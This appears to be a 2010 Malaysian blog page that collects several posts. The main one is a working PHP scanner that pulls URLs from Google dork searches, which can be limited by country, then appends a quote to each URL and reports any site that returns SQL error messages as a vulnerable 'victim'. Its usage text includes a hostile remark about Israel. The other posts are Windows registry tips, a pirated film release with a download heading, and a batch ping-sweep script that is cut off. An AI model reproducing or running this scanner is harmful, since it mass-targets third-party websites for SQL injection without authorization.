Friday, December 10, 2010

SQLi scanner by country

  1. <?php
  2.    
  3.    
  4.     set_time_limit(0);
  5.    
  6.     $vuln = 0;
  7.     $not_vuln = 0;
  8.     $total = 0;
  9.    
  10.     $country = array('AF','AL','DZ','AS','AD','AO','AI','aku','AG','AR','AM','AW','AU',
  11.                     'AT','AZ','BS','BH','BD','BB','BY','BE','BZ','BJ','BM','BT','BO','BA','BW','BV','BR','IO','BN','BG','BF','BI',
  12.                     'KH','CM','CA','CV','KY','CF','TD','CL','CN','CX','CC','CO','KM','CG','CD','CK','CR','CI','HR','CY','CZ','DK',
  13.                     'DJ','DM','DO','TL','EC','EG','SV','GQ','ER','EE','ET','FK','FO','FJ','FI','FR','GF','PF','TF','GA','GM','GE',
  14.                     'DE','GH','GI','GR','GL','GD','GP','GU','GT','GN','GW','GY','HT','HM','HN','HK','HU','IS','IN','ID','IQ','IE',
  15.                     'IL','IT','JM','JP','JO','KZ','KE','KI','KW','KG','LA','LV','LB','LS','LR','LY','LI','LT','LU','MO','MK','MG',
  16.                     'MW','MY','MV','ML','MT','MH','MQ','MR','MU','YT','MX','FM','MD','MC','MN','MS','MA','MZ','NA','NR','NP','NL',
  17.                     'AN','NC','NZ','NI','NE','NG','NU','NF','MP','NO','OM','PK','PW','PS','PA','PG','PY','PE','PH','PN','PL','PT',
  18.                     'PR','QA','RE','RO','RU','RW','KN','LC','VC','WS','SM','ST','SA','SN','CS','SC','SL','SG','SK','SI','SB','SO',
  19.                     'ZA','GS','KR','ES','LK','SH','PM','SR','SJ','SZ','SE','CH','TW','TJ','TZ','TH','TG','TK','TO','TT','TN','TR',
  20.                     'TM','TC','TV','UG','UA','AE','GB','US','UM','UY','UZ','VU','VA','VE','VN','VG','VI','WF','EH','YE','ZM','ZW');
  21.    
  22.     $bug = array(
  23.         'You have an error in your SQL','Division by zero in',
  24.         'supplied argument is not a valid MySQL result resource in',
  25.         'Call to a member function','Microsoft JET Database',
  26.         'ODBC Microsoft Access Driver',
  27.         'Microsoft OLE DB Provider for SQL Server',
  28.         'Unclosed quotation mark',
  29.         'Microsoft OLE DB Provider for Oracle',
  30.         'Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect',
  31.         'Incorrect syntax near'
  32.     );
  33.    
  34.     if(!$argv[1]) {
  35.         print "[%] Usage: $argv[0] <dork> <country>n";
  36.         print "[%] Example : $argv[0] inurl:news.php?id= 3nn";        
  37.         print "Country";
  38.         print "t1 - All Searchn";
  39.         print "t2 - Search in Malaysia Onlyn";
  40.         print "t3 - Search in F*** Israel n";
  41.         exit;
  42.     }
  43.    
  44.     if (!$argv[2] or !(in_array($argv[2], $country))) {
  45.         $goo = "http://www.google.com/search?q=$argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N";
  46.     } else {
  47.         foreach ($country as $i) {
  48.             if ($argv[2] == $i)
  49.                 $goo = "http://www.google.com/search?q=$argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N&cr=country$i";
  50.         }
  51.     }
  52.     for($i = 0; $i <= 900; $i += 100) {
  53.         $fp = @file_get_contents($goo);
  54.         @preg_match_all("/<h3 class=(.*?)><a href="(.*?)" class=(.*?)>/", $fp, $links);
  55.         $url[] = $links[2];
  56.     }
  57.    
  58.     print "[@] Pencarian dimulakan...n";
  59.     print "[@] Sekarang mencari Vulnerablen";
  60.     foreach($url as $key) {
  61.         foreach($key as $value) {
  62.             $fp = @file_get_contents($value."'");
  63.             foreach($bug as $error) {
  64.                 if(@preg_match("/$error/", $fp)) {
  65.                     print "[#] Manggsa >> $value'n";
  66.                     $vuln++;
  67.                 } else {
  68.                     $not_vuln++;
  69.                 }
  70.                 $total++;
  71.             }
  72.         }
  73.     }
  74.    
  75.     print "[@] Scanning Selesain";
  76.     print "[%] Keputusann";
  77.     print "[-] JUMLAH Vulnerable: $vulnn";
  78.     print "[-] JUMLAH Bukan Vulnerable : $not_vulnn";
  79.     print "[-] Jumlah Website scanned : $totaln";
  80. ?>


View hidden file using Dos

at command prompt just type
dir /ah
if the list is too long u can use
dir /ah/p/w


Change tumbnail size and quality

If any of you out there like to use the thumbnail view, especially for browsing through photos and images, it can become a bit of a drain on your system. It is possible to lower the thumbnail size and quality by editing the following registry keys.

Open the registry and navigate to :

HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer

Create a new DWORD value called ThumbnailSize, and set the value between 32 and 256.

And/or create another DWORD value called ThumbnailQuality, and set the value between 50 and 100.

Key Details :

USER Key: [HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer]
Value Name: ThumbnailSize
Data Type: REG_DWORD (DWORD Value)
Data Value: 32 - 256

USER Key: [HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer]
Value Name: ThumbnailQuality
Data Type: REG_DWORD (DWORD Value)
Data Value: 50 - 100


Monday, December 6, 2010

[Movie] Jangan Pandang Belakang Congkak 2 [2010] DVDrip [RMVB & MKV]

"Setelah berjaya memulihkan Punai, Asmat dan Johan serta berjaya menewaskan Mustika dalam JPBC yang lalu, Pak Mor yang cedera itu terus menuju ke anak sungai. Di tepi sungai, Pak Mor duduk bersila dan mula membaca jampi menteranya. Semakin lama semakin laju Pak Mor membaca jampi manteranya. Serentak angin mula bertiup. Semakin lama semakin kencang angin bertiup mengikut kelajuan Pak Mor membaca jampi manteranya. Tiba-tiba tubuh Pak Mor mula mengelupur. Mulutnya masih kumat kamit membaca jampi manteranya. Tiba-tiba Pak Mor kejang dan serentak dengan itu satu gumpalan asap keluar dari tubuh Pak Mor dan asap itu muncul Mustika. Setelah Mustika keluar dari tubuh Pak Mor, Pak Mor kembali pulih seperti sedia kala. Rupa-rupanya Pak Mor ada hubungan dengan Mustika dan mereka telah berpakat untuk mengambil semua harata dan saka-saka Pak Sudir setelah kematian Pak SudiR" ...


Mediafire :





Delete files from the recent file list in windows

This tip requires a change to the Windows Registry. Please see the MSFN Guide "Backup Your Registry" if you are new to the Windows Registry.

Windows Media Player (WMP) is a built-in application that allows you to play multimedia files. Like many other applications, WMP remembers the most recently played files and displays them in the Recent File List under the File menu. This feature is useful if you regularly play certain files, but you may want to clear the list if you share the computer and a user account or create archives and CDs.

There are two ways you can clear the list:

I. The ClearMRU.exe Utility is available for free in the Windows Media Player Bonus Pack from Microsoft, but Microsoft does not support this tool.

II. You can also manually delete the list through the Windows Registry:

1. Start the Windows Registry Editor, regedit.exe, by typing regedit in the Windows Run Command Line.

2. Go to HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList.

3. Delete the RecentFileList subkey.

4. If you've also streamed content from the Internet, you can delete the RecentURLList subkey.

5. Exit the Registry Editor.

6. Restart the computer.

To keep certain files in the list, don't delete the entire key. Deleting individual entries within the key will get rid of the files that you no longer want in the Recent File List.


Ping sweeper - batch script

This simple ping sweeper to a giving range of IP..


@echo off  
cls
@color 0A  
echo  
echo *************************  
echo *  @pih ping sweeper    *  
echo *************************    
echo.       
for /l %%a in (1,1,255) do (  
ping -n 1 10.19.127.%%a | find "Reply" 

Simply copy and paste in notepad & save it as ping_sweeper.bat